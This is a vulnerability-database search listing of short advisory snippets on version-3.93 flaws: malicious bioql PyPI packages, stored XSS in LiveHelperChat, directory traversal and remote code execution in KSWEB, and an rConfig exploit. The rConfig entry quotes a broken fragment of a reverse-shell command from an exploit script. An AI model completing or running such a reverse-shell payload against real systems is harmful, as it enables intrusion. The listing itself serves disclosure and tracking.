18 matches found
EUVD-2022-0462
Malicious code in bioql PyPI...
EUVD-2022-0717
Malicious code in bioql PyPI...
EUVD-2022-0735
Malicious code in bioql PyPI...
EUVD-2022-0833
Malicious code in bioql PyPI...
EUVD-2022-1217
Malicious code in bioql PyPI...
EUVD-2022-1029
Malicious code in bioql PyPI...
CVE-2022-0387
Cross-site Scripting XSS - Stored in Packagist remdex/livehelperchat prior to 3.93v...
PT-2022-13298 · Remdex · Livehelperchat
Name of the Vulnerable Software and Affected Versions: remdex/livehelperchat versions prior to 3.93v Description: The issue is related to Cross-site Scripting XSS - Stored. This means an attacker can inject malicious scripts into the application, which are then stored and executed by the...
GHSA-57QF-82HH-2HMC Cross-site Scripting in LiveHelperChat
LiveHelperChat prior to version 3.93 is vulnerable to cross-site scripting...
livehelperchat cross-site scripting vulnerability (CNVD-2022-08146)
livehelperchat is available through live helper chat and can be used to provide live support on the website for free. Livehelperchat has a cross-site scripting vulnerability in version 3.93 that stems from the lack of proper validation of client-side data in the WEB application. An attacker can...
PT-2022-13151 · Unknown · Livehelperchat
Name of the Vulnerable Software and Affected Versions: LiveHelperChat versions prior to 3.93 Description: The issue is a stored Cross-site Scripting XSS vulnerability. It allows attackers to inject malicious scripts into the application, potentially leading to unauthorized access or data theft. T...
PT-2022-13152 · Unknown · Livehelperchat
Name of the Vulnerable Software and Affected Versions: LiveHelperChat versions prior to 3.93 Description: The issue is related to a Cross-site Scripting XSS - Stored vulnerability. This type of vulnerability allows an attacker to inject malicious scripts into a website, which can then be executed...
livehelperchat cross-site scripting vulnerability
livehelperchat is a chat via a live helper that provides free live support on a website. A cross-site scripting vulnerability exists in livehelperchat that stems from the presence of xss in Packagist remdex livehelperchat prior to 3.93v. An attacker could exploit this vulnerability to execute...
rConfig 3.93 Authenticated Remote Code Execution
Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution Date: 2020-03-08 Exploit Author: Engin Demirbilek Vendor Homepage: https://www.rconfig.com/ Version: rConfig & /dev/tcp// 0&1;".formatsys.argv4, sys.argv5 login = 'user':user, 'pass':password, 'sublogin':'1' r...
CVE-2019-16198
KSLabs KSWEB 3.93 allows ../ directory traversal, as demonstrated by the hostFile parameter...
Directory traversal
KSLabs KSWEB 3.93 allows ../ directory traversal, as demonstrated by the hostFile parameter...
CVE-2019-16198
CVE-2019-16198 affects KSLabs KSWEB 3.93. The issue is a directory traversal in the hostFile parameter handling, enabling an attacker to traverse directories and view system files. Public references across multiple feeds (NVD, CNVD, Red Hat, PRION, CVE records) consistently describe this vulnerab...
CVE-2019-15766
CVE-2019-15766 affects the KSLABS KSWEB Android app (v3.93). An authenticated attacker can trigger remote code execution by sending a POST to the AJAX handler with configFile (arbitrary file path) and config_text (content to write), potentially writing and executing a PHP file in the device’s pub...